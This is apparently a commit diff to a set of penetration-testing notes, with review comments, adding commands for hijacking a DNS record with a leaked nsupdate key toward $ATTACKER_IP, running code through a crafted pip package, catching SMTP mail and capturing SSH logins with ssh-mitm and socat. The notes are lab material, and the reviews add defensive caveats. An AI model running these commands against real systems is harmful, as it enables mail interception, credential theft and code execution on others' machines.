bump
This commit is contained in:
parent
840daf84da
commit
b0b36adea5
@ -23,3 +23,21 @@ send
quit
```
* Check domain by querying the subdomain's A record via dig/drill/nslookup

### Found Secrets for Keys

If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.

```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
namefromtext
keycreate

server <domain>
update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
send
```

Copy the lines, every space counts as it has to be exactly like in the example

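Review bot: the `sh` block mixes what is typed into nsupdate with the debug output that `-d` prints (`Creating key...`, `namefromtext`, `keycreate`), yet the closing sentence tells the reader to copy the lines exactly as shown; move those three lines out of the block or mark them as output so that only `nsupdate -d -y ...`, `server <domain>`, `update add ...` and `send` remain. The placeholders are also inconsistent: `server <domain>` is generic while the update line hardcodes `mail.snoopy.htb.`, so either both should be placeholders or both concrete. Wording: "possiblity" is misspelled and "the possiblity of found secret for a key" should read something like "if the secret of a key is found". One sentence on why this works would help the reader who has to defend such a setup: anyone holding the key secret from `named.conf` can push dynamic updates with `-y`, which is the reason that file and its keys need tight permissions and `allow-update` should be limited to the zones and keys that actually need it.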
@ -1,6 +1,6 @@
# Tips & Tricks for Binary Exploitations

# Toggle ASLR
## Toggle ASLR

State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.

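Review bot: the only change here is the heading level, but the paragraph under it still says the state "can be switched via sysctl parameter `randomize_va_space`" without showing how to read or set it; since the sysctl is `kernel.randomize_va_space`, add the read/write form and the meaning of the values the linked kernel documentation lists (0 off, 1 conservative, 2 full), so the section is usable without opening the link. "State of ASLR" should be "The state of ASLR".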
@ -39,3 +39,10 @@ echo -e '\xde\xad\xc0\xde' | xxd
## NULL bytes in Adresses

NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes

## Read from running process

Read from a running process' stdout by attaching to the process via strace and read in the following way
```sh
strace -e read -p <ProcessId>
```

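Review bot: the strace command does not match the sentence above it: `-e read` traces the `read()` syscalls, i.e. what the process takes in, whereas its stdout is produced by `write()` on file descriptor 1, so the sentence should say "read a process' input" or the command should use `-e write`; in either case add `-s <n>` because strace truncates printed strings at 32 bytes by default, and note that attaching with `-p` needs ptrace permission on the target process. In the NULL-bytes paragraph, "Adresses" is misspelled and "stop the execution of the payload input as a whole" is misleading: it is not execution that stops, but C-string based input and copy routines treat `\x00` as the terminator and truncate the payload there, while `read()` copies a byte count and carries on; the sentence is also missing its final period.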
@ -0,0 +1,12 @@
# PIP Exploits

## pip download

Python pip executes tar files after the download option has been triggered.
Therefore, a hand crafted python module needs to be created and build.
After that pip can be used in the following way
```sh
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
```

An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)
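Review bot: "Python pip executes tar files" is not what happens and will mislead readers; pip unpacks the source distribution and runs its `setup.py` (the build backend) to obtain metadata, so `pip download` runs code from the package even though nothing is installed. State that, and add the mitigation that follows from it: `--only-binary=:all:` makes pip refuse source distributions, and `--trusted-host` together with an `http://` index disables TLS verification, so the flags shown belong in a lab only. Grammar: "created and build" should be "created and built", and "An in detail blog post has been done by" should be "A detailed blog post has been written by".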
@ -1,3 +1,10 @@
# SMTP

* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)

## Adhoc SMTP Server

Set up an SMTP Server quickly using `maildev`
```sh
sudo maildev -s 25 --ip $ATTACKER_IP
```

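Review bot: the section never says what `maildev` is or where it comes from; add that it is a Node.js package installed via npm, and that `sudo` is needed here only because `-s 25` binds a privileged port. Worth a caveat as well: maildev also serves a web inbox on a separate port and accepts any mail on the SMTP side, so the instance should be bound to the lab interface as shown and stopped afterwards, not left listening. Spelling: "Adhoc" should be "Ad-hoc", and the sentence before the block is missing its final period.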
@ -1,5 +1,8 @@
# Man In the Middle


## Ettercap

* [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/)

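Review bot: the new heading `## Ettercap` sits above a list that also links Bettercap, so the heading does not describe its content; name it `## Tools` (or similar) or move the Bettercap link into its own section. There are also two consecutive blank lines after the title; one is enough.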
@ -19,6 +22,7 @@ if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
```

* Escape double quote inside the payload string
* compile via
```sh
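Review bot: the added bullet "Escape double quote inside the payload string" should show the form, i.e. write `\"` inside the string passed to `replace()`/`msg()`, otherwise the reader has to guess; the two bullets should also agree in capitalisation ("Escape ..." vs "compile via"). Related, the compile command visible in the following hunk's context, `etterfilter filter.ef -o filter.ef`, reads the filter source and writes the compiled output to the same file name, so use a distinct source name (for example `filter.txt -o filter.ef`) or the source is overwritten. Finally, the fence that opens right after "* compile via" has no blank line before it, which in most Markdown renderers nests it inside the bullet or breaks the list.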
@ -29,3 +33,16 @@ etterfilter filter.ef -o filter.ef
```sh
ettercap -T -i <interface> -M arp -F filter.ef
```

## mitm-server

Set up a local Man in the middle server which can be used for example for password looting if somebody logs in.
[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`.

Redirect the port to the mitm server and start it afterwards

```sh
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)

ssh-mitm server --remote-host $TARGET_IP
```

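Review bot: the socat line hardcodes `10.10.14.4:10022` while the rest of these notes use `$ATTACKER_IP` and `$TARGET_IP`, and the text never explains the two ports, so say that 2222 is the port exposed to the client and 10022 the port ssh-mitm itself listens on, and use the variable instead of the literal address. "download the package via `pip install ssh-mitm`" should be "install the package". Because the section is about credential capture, add the defensive counterpart in one sentence: the interception only succeeds when the client accepts an unknown or changed host key, which is what strict host-key checking and key-based authentication are there to prevent.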